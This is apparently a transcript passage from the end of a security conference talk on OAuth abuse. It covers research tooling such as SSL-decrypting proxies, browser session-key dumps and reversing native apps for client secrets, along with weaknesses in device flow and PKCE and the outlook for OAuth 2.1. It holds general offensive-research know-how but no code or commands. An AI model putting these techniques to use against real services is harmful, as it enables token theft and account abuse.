And at the end of the day, anything that's complex and then gets simplified is ripe for abuse. We definitely want to look where the puck is going in terms of protocol development; that gives hints. Quickly, in terms of the research stack: sitting in the middle of all this is useful, using a proxy with SSL decryption, assuming you can provision some certs along the way. Outright sniffing gives a more limited view, but with browser traffic you can decrypt that too, because browsers will dump their SSL session keys if you ask for them. Source code, don't ignore that. From a research perspective, Chromium is out there, open source, which gives a lot of hints about what Google's doing in Chrome. Reversing usually isn't needed, but sometimes there are secrets that aren't really secrets, because they're baked into a native app, and you can reverse them and find things like client secrets. And so I'm going to jump ahead. This isn't where the puck is going; this is a picture from Aaron Parecki of Okta, I think he's still at Okta, who had a good blog, and it represents OAuth as it is today. It's a maze of RFC specs that contribute to and make up what we use ubiquitously. It's a mess; no one can understand this. Where's it going? Well, in seven short little screen pictures, and this is Aaron's doing, not mine.
Top left is where we were in 2012: four different flows. Along the way, some of them had to be extended to be more secure with PKCE, which is an extra secret, until we get to the bottom right, where Aaron believes OAuth 2.1 will simplify things and remove all those insecure flows. So this gives hints: all the stuff that's being removed is probably more ripe for abuse today. But maybe in the next year we end up with a more simplified OAuth, and you might think, wow, that gives us hope. No, it doesn't, because one of the flows that remains is device flow, and we've seen today how bad that can be. And we believe PKCE will stand up; we'll see how it gets implemented, but if I control the app, I can generate any secret. So finally, to conclude, and to make sure I don't get kicked off and tossed out of here: there are ongoing research areas, and all I want to say is that OAuth is so complicated that this list gets pretty long, it's here today, and we're just scratching the surface. And I'll call out to everyone, if you didn't catch it: Matthew Bryant had some great stuff about Apps Script in Google, and there's some OAuth underneath it, and it shows how OAuth can go in a whole different direction, contribute to other vulnerabilities, and lead to some pretty big abuse. So, in the interest of ending sort of on time, that's it. There's some open source that drives the demo that was in the video, which at least makes the whole interchange clear; you can pick that up in the slides. If you have follow-on questions, there's a session, I believe at five, in the Gold Room next door; feel free to approach me and ask questions. My contact information is there, and you can find me in a lot of the usual places. And at the end of the day, all I have to say about OAuth, the one big surprise I didn't think I'd be saying, is that I never would have thought all the research I did on OAuth would lead me back to thinking a different security model, of hard-coded client IDs and secrets, was a good idea. Are you listening, Amazon? AWS out there: the AWS secret
API keys that get uploaded to GitHub and Pastebin? By comparison, I understand your exposure with that, and so does everyone else: don't hard-code stuff, put it in external files, don't upload it to GitHub. Here, you've essentially got a permanent OAuth key that ultimately gets abused in the same way, but the problem is no one understands this. And I guarantee you, in five minutes you're going to flush this from your brain, because your head hurts. My head hurts, from spending a lot more time on it than you. So that's part of the lesson here: there are a lot of opportunities, no matter who you are. But no matter what, this is an area that deserves a lot more research. Thank you.